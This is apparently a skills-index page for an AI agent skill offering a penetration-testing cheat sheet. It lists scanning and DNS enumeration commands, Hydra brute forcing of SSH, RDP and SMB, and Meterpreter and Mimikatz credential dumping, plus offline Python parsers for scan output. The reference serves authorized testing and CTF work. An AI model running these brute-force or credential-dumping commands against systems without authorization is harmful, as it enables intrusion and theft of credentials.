Quick Pentest Reference

This skill should be used when the user asks to "perform quick enumeration", "run directory busting", "enumerate DNS", "discover live hosts", "brute force passwords", or otherwise needs a pentest cheat sheet. It provides rapid reference commands for penetration testing.

Safety Notice

This listing is imported from skills.sh public index metadata. Review upstream SKILL.md and repository scripts before running.

Install skill "Quick Pentest Reference" with this command: npx skills add zebbern/secops-cli-guides/zebbern-secops-cli-guides-quick-pentest-reference

Quick Pentest Reference

Purpose

Provide rapid-access command references for common penetration testing tasks including directory busting, DNS enumeration, host discovery, service scanning, and password brute forcing. This skill serves as a quick reference for CTFs and penetration testing engagements.

Prerequisites

Required Tools

  • Nmap, Gobuster, FFUF
  • Hydra, Nikto
  • dig, nslookup, host
  • SecLists wordlists

Installation

sudo apt update
sudo apt install nmap gobuster ffuf hydra nikto dnsutils
sudo apt install seclists

Core Workflow

Phase 1: Directory Busting

Discover hidden directories and files:

Gobuster Directory Scan

# Basic directory scan
gobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/dirb/common.txt

# With extensions
gobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/dirb/common.txt -x php,txt,html

# Only show selected status codes (gobuster 3.x refuses -s unless the default 404 blacklist is cleared with -b "")
gobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s 200,301,302 -b ""

FFUF Directory Scan

# Basic scan
ffuf -u http://10.10.10.10/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

# With file extensions
ffuf -u http://10.10.10.10/FUZZ -w /usr/share/wordlists/dirb/common.txt -e .php,.txt,.html

# Filter by response size (run once unfiltered, note the size of the catch-all response, then filter it out)
ffuf -u http://10.10.10.10/FUZZ -w wordlist.txt -fs 4242

# Filter by status code
ffuf -u http://10.10.10.10/FUZZ -w wordlist.txt -fc 404

Phase 2: VHOST Enumeration

Discover virtual hosts and subdomains:

Gobuster VHOST Scan

# gobuster 3.2+ needs --append-domain, otherwise the Host header is the bare wordlist entry
gobuster vhost -u http://example.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain

FFUF VHOST Scan

ffuf -u http://example.com -H "Host: FUZZ.example.com" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt

# Filter false positives: every unknown Host gets the default site, so drop responses of that size
# (find it with one request using a random Host, here assumed to be 4242 bytes)
ffuf -u http://example.com -H "Host: FUZZ.example.com" -w wordlist.txt -fs 4242
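The -fs value above has to be calibrated by hand. The following added example (not part of the original skill or of ffuf) automates that step: it sends one request with a random, non-existent Host to learn what the catch-all response looks like, then reports every wordlist entry whose response differs. The target web server, its two "real" virtual hosts and the wordlist are all constructed inside the script so it runs offline; against a real target, replace start_target() with the engagement's address and port.

```python
"""Virtual-host discovery with automatic baseline calibration (added example, not from the skill)."""
import http.client
import secrets
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed target: two real vhosts, every other Host header gets the default page.
KNOWN_VHOSTS = {
    "admin.example.com": b"<html><body>admin console login</body></html>",
    "dev.example.com": b"<html><body>dev build 1.2.3</body></html>",
}
DEFAULT_PAGE = b"<html><body>It works! default site</body></html>"


class _VhostHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        host = self.headers.get("Host", "").split(":")[0].lower()
        body = KNOWN_VHOSTS.get(host, DEFAULT_PAGE)
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_target():
    """Start the constructed target on an ephemeral localhost port."""
    srv = HTTPServer(("127.0.0.1", 0), _VhostHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def probe(addr, port, host_header):
    """Return (status, body_length) for GET / with the given Host header."""
    conn = http.client.HTTPConnection(addr, port, timeout=5)
    conn.request("GET", "/", headers={"Host": host_header})
    resp = conn.getresponse()
    body = resp.read()
    conn.close()
    return resp.status, len(body)


def find_vhosts(addr, port, domain, words):
    """Calibrate with a random Host, then return (baseline, [(name, status, size)]) for names that differ."""
    baseline = probe(addr, port, f"{secrets.token_hex(6)}.{domain}")
    hits = []
    for w in words:
        name = f"{w}.{domain}"
        status, size = probe(addr, port, name)
        if (status, size) != baseline:  # differs from the catch-all response in status or size
            hits.append((name, status, size))
    return baseline, hits


if __name__ == "__main__":
    srv = start_target()
    addr, port = srv.server_address
    # Constructed stand-in for subdomains-top1million-5000.txt
    wordlist = ["www", "admin", "dev", "staging", "mail"]
    base, found = find_vhosts(addr, port, "example.com", wordlist)
    print(f"baseline: status={base[0]} size={base[1]}")
    for name, status, size in found:
        print(f"[+] {name} status={status} size={size}")
    srv.shutdown()
```

Comparing the whole (status, size) pair rather than size alone also catches vhosts that redirect or deny access, which a size-only filter can miss when the page happens to be the same length as the default one.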

Phase 3: Digital Certificate Reconnaissance

Passive subdomain discovery via certificates:

Certificate Search Engines

crt.sh Command Line

# Query crt.sh via curl; name_value may hold several names separated by newlines and wildcard entries,
# so strip the leading "*." before deduplicating
curl -s "https://crt.sh/?q=%25.example.com&output=json" | jq -r '.[].name_value' | sed 's/^\*\.//' | sort -u

Phase 4: DNS Enumeration

Query DNS records for intelligence:

DNS Record Types

Type     Purpose
A        IPv4 address
AAAA     IPv6 address
MX       Mail servers
NS       Name servers
TXT      Text records (SPF, DKIM, DMARC, verification tokens)
CNAME    Canonical name (alias)
SOA      Start of authority

Dig Commands

# A record
dig example.com A

# All records (many resolvers and authoritative servers answer ANY minimally or refuse it, per RFC 8482;
# query the individual types if the answer looks truncated)
dig example.com ANY

# MX records
dig example.com MX

# Name servers
dig example.com NS

# TXT records (SPF, DKIM)
dig example.com TXT

# Reverse lookup
dig -x 192.168.1.1

# Use specific DNS server
dig @8.8.8.8 example.com

Host Command

# Basic lookup
host example.com

# Specific record type
host -t MX example.com
host -t NS example.com

# Verbose output
host -a example.com

Nslookup

# Interactive mode
nslookup
> server 8.8.8.8
> set type=MX
> example.com

# Direct queries
nslookup example.com
nslookup -type=MX example.com
nslookup -type=NS example.com

Phase 5: Zone Transfer

Attempt DNS zone transfer for full records:

# Dig zone transfer
dig @ns1.example.com example.com AXFR

# Host zone transfer
host -l example.com ns1.example.com

# Nslookup zone transfer (the ls subcommand exists only in the Windows nslookup; BIND's nslookup on Linux does not have it)
nslookup
> server ns1.example.com
> ls -d example.com
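The crt.sh query in Phase 3 and the zone transfer above both produce raw text that needs post-processing before it is useful: crt.sh's name_value field packs several names (and wildcards) into one string, and dig's AXFR output mixes records with comments and a repeated SOA. The following added example (not from the skill or from either tool) parses both, merges the hostnames, and flags A records pointing at RFC 1918 space, which is the classic "internal host leaked through public DNS" finding. The crt.sh JSON and the dig output are constructed samples in the real formats so the script runs offline; the zone content and addresses are invented.

```python
"""Merge passive (crt.sh) and active (AXFR) subdomain intelligence (added example, not from the skill)."""
import ipaddress
import json
import re

# Constructed crt.sh response for q=%.example.com&output=json (fields trimmed to what is used here)
CRTSH_JSON = json.dumps([
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3", "name_value": "www.example.com\nexample.com"},
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3", "name_value": "*.dev.example.com"},
    {"issuer_name": "C=US, O=DigiCert Inc", "name_value": "vpn.example.com\nMail.Example.com"},
])

# Constructed `dig @ns1.example.com example.com AXFR` output
AXFR_OUTPUT = """\
; <<>> DiG 9.18.24 <<>> @ns1.example.com example.com AXFR
;; global options: +cmd
example.com.            3600    IN      SOA     ns1.example.com. hostmaster.example.com. 2024010101 7200 3600 1209600 3600
example.com.            3600    IN      NS      ns1.example.com.
example.com.            3600    IN      MX      10 mail.example.com.
mail.example.com.       3600    IN      A       203.0.113.25
www.example.com.        300     IN      A       203.0.113.10
intranet.example.com.   300     IN      A       10.10.5.20
gitlab.example.com.     300     IN      CNAME   intranet.example.com.
example.com.            3600    IN      SOA     ns1.example.com. hostmaster.example.com. 2024010101 7200 3600 1209600 3600
;; Query time: 12 msec
"""

# RFC 1918 plus loopback; ipaddress.is_private is not used because it also matches the
# documentation ranges (203.0.113.0/24 etc.) used in the sample zone.
_INTERNAL = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

_RR = re.compile(r"^(?P<name>\S+)\s+\d+\s+IN\s+(?P<type>[A-Z]+)\s+(?P<data>.+)$")


def names_from_crtsh(raw_json, domain):
    """Return the set of concrete hostnames under `domain` from a crt.sh JSON body."""
    names = set()
    for entry in json.loads(raw_json):
        for name in entry["name_value"].splitlines():
            name = name.strip().lower().lstrip("*.")  # drop wildcard prefix, normalise case
            if name == domain or name.endswith("." + domain):
                names.add(name)
    return names


def records_from_axfr(text):
    """Parse dig AXFR output into (name, type, rdata) tuples, skipping comments and the closing SOA."""
    records, seen_soa = [], False
    for line in text.splitlines():
        m = _RR.match(line)
        if not line or line.startswith(";") or not m:
            continue
        name, rtype, data = m.group("name").rstrip(".").lower(), m.group("type"), m.group("data").strip()
        if rtype == "SOA":
            if seen_soa:  # AXFR ends with a second copy of the SOA
                continue
            seen_soa = True
        records.append((name, rtype, data))
    return records


def private_hosts(records):
    """A records whose address is internal: hosts leaked through public DNS."""
    out = []
    for name, rtype, data in records:
        if rtype == "A" and any(ipaddress.ip_address(data) in net for net in _INTERNAL):
            out.append((name, data))
    return out


def merged_hostnames(raw_json, axfr_text, domain):
    """Union of crt.sh names and zone owner names under `domain`, sorted."""
    names = names_from_crtsh(raw_json, domain)
    names |= {n for n, _, _ in records_from_axfr(axfr_text) if n == domain or n.endswith("." + domain)}
    return sorted(names)


if __name__ == "__main__":
    recs = records_from_axfr(AXFR_OUTPUT)
    for host in merged_hostnames(CRTSH_JSON, AXFR_OUTPUT, "example.com"):
        print(host)
    for name, ip in private_hosts(recs):
        print(f"[!] internal address in public zone: {name} -> {ip}")
```

Feed the merged list into the brute-force and vhost phases; the internal-address hits are worth reporting on their own, since they reveal naming conventions and address ranges before any host on the inside has been touched.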

Phase 6: Automated DNS Tools

DNSRecon

# Standard enumeration
dnsrecon -d example.com

# Zone transfer attempt
dnsrecon -d example.com -t axfr

# Brute force subdomains
dnsrecon -d example.com -t brt -D /usr/share/wordlists/subdomains.txt

DNSenum

# Full enumeration
dnsenum example.com

# With wordlist
dnsenum --enum example.com -f /usr/share/wordlists/subdomains.txt

Fierce

# Subdomain enumeration
fierce --domain example.com

# With wordlist
fierce --domain example.com --subdomain-file wordlist.txt

Phase 7: Host Discovery

Identify live hosts on the network:

Netdiscover

# Active scan
netdiscover -i eth0

# Passive mode
netdiscover -p -i eth0

# Specific range
netdiscover -r 192.168.1.0/24

ARP Scan

# Local network
arp-scan -l

# Specific interface
arp-scan -I eth0 -l

# Specific range
arp-scan 192.168.1.0/24

Nmap Host Discovery

# Ping sweep
nmap -sn 192.168.1.0/24

# ARP ping (local network)
nmap -sn -PR 192.168.1.0/24

# ICMP echo ping
nmap -sn -PE 192.168.1.0/24

# TCP SYN ping
nmap -sn -PS 192.168.1.0/24

# UDP ping
nmap -sn -PU 192.168.1.0/24

# ICMP timestamp request
nmap -sn -PP 192.168.1.0/24

# ICMP address mask request (still ICMP, but sometimes passes filters that only drop echo requests)
nmap -sn -PM 192.168.1.0/24

Phase 8: Service and OS Discovery

Enumerate ports, services, and operating systems:

Nmap Service Scans

# SYN scan with version detection (-sS, -sU and -O need raw sockets, hence sudo)
sudo nmap -sS -sV 192.168.1.1

# Full TCP scan with OS detection
sudo nmap -T4 -p- -A 192.168.1.1

# UDP scan
sudo nmap -sU -T4 192.168.1.1

# Top 1000 ports
sudo nmap -sS -sV --top-ports 1000 192.168.1.1

# All ports aggressive
sudo nmap -sS -sV -sC -O -p- 192.168.1.1

# Banner grabbing
nmap --script=banner 192.168.1.1

# Subnet scan
nmap 192.168.1.0/24
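Both the host discovery sweeps in Phase 7 and the service scans above are easier to chain into later phases when nmap writes XML (-oX scan.xml) instead of screen output. The following added example (not from the skill or from nmap) turns that XML into a per-host inventory and answers the two questions the next phases ask: which hosts are up, and which of them expose a given service. The XML document is a constructed sample in nmap's output format, trimmed to the elements used; the hosts, MAC and versions are invented.

```python
"""Parse nmap -oX output into a host/port inventory (added example, not from the skill)."""
import ipaddress
import xml.etree.ElementTree as ET

# Constructed sample of `nmap -sS -sV -p- -oX scan.xml 192.168.1.0/24`
NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sS -sV -p- -oX scan.xml 192.168.1.0/24">
  <host><status state="up" reason="arp-response"/>
    <address addr="192.168.1.1" addrtype="ipv4"/>
    <address addr="00:11:22:33:44:55" addrtype="mac" vendor="Cisco"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH" version="7.4"/></port>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http" product="nginx" version="1.18.0"/></port>
      <port protocol="tcp" portid="443"><state state="closed"/><service name="https"/></port>
    </ports>
  </host>
  <host><status state="up" reason="arp-response"/>
    <address addr="192.168.1.20" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds" product="Samba smbd" version="4.6.2"/></port>
      <port protocol="tcp" portid="3389"><state state="filtered"/><service name="ms-wbt-server"/></port>
    </ports>
  </host>
  <host><status state="down" reason="no-response"/>
    <address addr="192.168.1.99" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return {ip: {"up": bool, "mac": str|None, "open": [(port, proto, service, product_version)]}}."""
    hosts = {}
    for h in ET.fromstring(xml_text).iter("host"):
        ip = mac = None
        for a in h.findall("address"):
            if a.get("addrtype") == "ipv4":
                ip = a.get("addr")
            elif a.get("addrtype") == "mac":
                mac = a.get("addr")
        status = h.find("status")
        open_ports = []
        for p in h.iter("port"):
            if p.find("state").get("state") != "open":
                continue  # closed/filtered ports are noise for the inventory
            svc = p.find("service")
            name = svc.get("name", "") if svc is not None else ""
            prodver = " ".join(x for x in (svc.get("product"), svc.get("version")) if x) if svc is not None else ""
            open_ports.append((int(p.get("portid")), p.get("protocol"), name, prodver))
        hosts[ip] = {
            "up": status is not None and status.get("state") == "up",
            "mac": mac,
            "open": open_ports,
        }
    return hosts


def live_hosts(hosts):
    """IPs that answered, in numeric (not lexical) order."""
    return sorted((ip for ip, info in hosts.items() if info["up"]), key=ipaddress.ip_address)


def hosts_with_service(hosts, service_name):
    """Live hosts exposing a service, e.g. to pick SMB targets for the brute-force phase."""
    return sorted((ip for ip, info in hosts.items()
                   if info["up"] and any(s == service_name for _, _, s, _ in info["open"])),
                  key=ipaddress.ip_address)


if __name__ == "__main__":
    inv = parse_nmap_xml(NMAP_XML)
    for ip in live_hosts(inv):
        print(ip, inv[ip]["mac"] or "")
        for port, proto, svc, ver in inv[ip]["open"]:
            print(f"  {port}/{proto} {svc} {ver}")
    print("smb targets:", hosts_with_service(inv, "microsoft-ds"))
```

Keeping the raw XML from every scan also gives the engagement a record of what was actually sent and when, which the Authorization section below asks for.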

Nikto Web Scanner

# Basic scan
nikto -h http://192.168.1.1

# With SSL
nikto -h https://192.168.1.1 -ssl

# Save output (nikto's format names are csv, htm, json, msf+, nbe, txt, xml)
nikto -h http://192.168.1.1 -o nikto_report.html -Format htm

Phase 9: Password Brute Force

Attack authentication services:

Hydra

# SSH brute force (sshd limits parallel sessions; hydra itself recommends -t 4 here)
hydra -l root -P /usr/share/wordlists/rockyou.txt -t 4 ssh://192.168.1.1

# FTP brute force
hydra -L users.txt -P passwords.txt ftp://192.168.1.1

# HTTP POST form
hydra -l admin -P passwords.txt 192.168.1.1 http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid"

# HTTP Basic Auth
hydra -l admin -P passwords.txt 192.168.1.1 http-get /admin/

# RDP brute force
hydra -l administrator -P passwords.txt rdp://192.168.1.1

# SMB brute force
hydra -L users.txt -P passwords.txt smb://192.168.1.1

Phase 10: Post Exploitation

Actions after gaining access:

Windows Credential Dumping

# Meterpreter (hashdump and kiwi need SYSTEM, so escalate first)
meterpreter> getsystem
meterpreter> hashdump
meterpreter> load kiwi
meterpreter> creds_all

# Mimikatz (enable SeDebugPrivilege before touching LSASS)
mimikatz# privilege::debug
mimikatz# sekurlsa::logonpasswords
mimikatz# lsadump::sam

Linux Privilege Escalation

# Check sudo permissions
sudo -l

# Find SUID binaries
find / -type f -perm -4000 2>/dev/null

# Check cron jobs
cat /etc/crontab
ls -la /etc/cron.*

# LinPEAS enumeration
./linpeas.sh

Quick Reference

Essential Wordlists

Path                                                                 Purpose
/usr/share/wordlists/dirb/common.txt                                 Common directories
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt         Medium directory list
/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt    Subdomains
/usr/share/wordlists/rockyou.txt                                     Passwords (ships as rockyou.txt.gz on Kali; gunzip it first)

Command Quick Reference

Task              Command
Directory bust    gobuster dir -u URL -w wordlist
VHOST enum        ffuf -H "Host: FUZZ.domain" -u URL -w wordlist
DNS lookup        dig domain.com ANY (fall back to A, MX, NS, TXT individually when ANY is answered minimally)
Zone transfer     dig @ns.domain.com domain.com AXFR
Host discovery    nmap -sn 192.168.1.0/24
Port scan         sudo nmap -sS -sV -p- target
Brute force       hydra -l user -P list service://target

Constraints and Limitations

Authorization

  • Only test systems you own or have permission to test
  • Document all testing activities
  • Stay within scope

Tool Limitations

  • Some scans may trigger IDS/IPS
  • Rate limiting may block aggressive scans
  • Firewalls may block certain techniques

Troubleshooting

Scans Returning No Results

Solutions:

  1. Verify target is reachable
  2. Try different scanning techniques
  3. Check for firewall blocks
  4. Use slower scan rates

Source Transparency

This detail page is rendered from real SKILL.md content. Trust labels are metadata-based hints, not a safety guarantee.
